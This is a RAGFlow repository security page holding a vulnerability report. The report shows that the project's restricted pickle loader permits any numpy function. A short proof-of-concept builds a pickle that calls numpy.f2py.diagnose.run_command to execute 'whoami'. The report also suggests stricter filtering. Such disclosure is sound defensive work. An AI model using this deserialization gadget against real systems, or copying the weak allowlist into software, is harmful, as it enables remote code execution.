f36e2104d8
sep-tests / ragflow_preflight (push) Waiting to run
sep-tests / ragflow_tests_infinity (push) Blocked by required conditions
sep-tests / ragflow_tests_elasticsearch (push) Blocked by required conditions
tests / ragflow_preflight (push) Waiting to run
tests / ragflow_tests_infinity (push) Blocked by required conditions
tests / ragflow_tests_elasticsearch (push) Blocked by required conditions
1.9 KiB
1.9 KiB
Security Policy
Supported Versions
Use this section to tell people about which versions of your project are currently being supported with security updates.
| Version | Supported |
|---|---|
| <=0.7.0 | ✅ |
Reporting a Vulnerability
Branch name
main
Actual behavior
The restricted_loads function at api/utils/__init__.py#L215 is still vulnerable leading via code execution. The main reason is that numpy module has a numpy.f2py.diagnose.run_command function directly execute commands, but the restricted_loads function allows users import functions in module numpy.
Steps to reproduce
ragflow_patch.py
import builtins
import io
import pickle
safe_module = {
'numpy',
'rag_flow'
}
class RestrictedUnpickler(pickle.Unpickler):
def find_class(self, module, name):
import importlib
if module.split('.')[0] in safe_module:
_module = importlib.import_module(module)
return getattr(_module, name)
# Forbid everything else.
raise pickle.UnpicklingError("global '%s.%s' is forbidden" %
(module, name))
def restricted_loads(src):
"""Helper function analogous to pickle.loads()."""
return RestrictedUnpickler(io.BytesIO(src)).load()
Then, PoC.py
import pickle
from ragflow_patch import restricted_loads
class Exploit:
def __reduce__(self):
import numpy.f2py.diagnose
return numpy.f2py.diagnose.run_command, ('whoami', )
Payload=pickle.dumps(Exploit())
restricted_loads(Payload)
Additional information
How to prevent?
Strictly filter the module and name before calling with getattr function.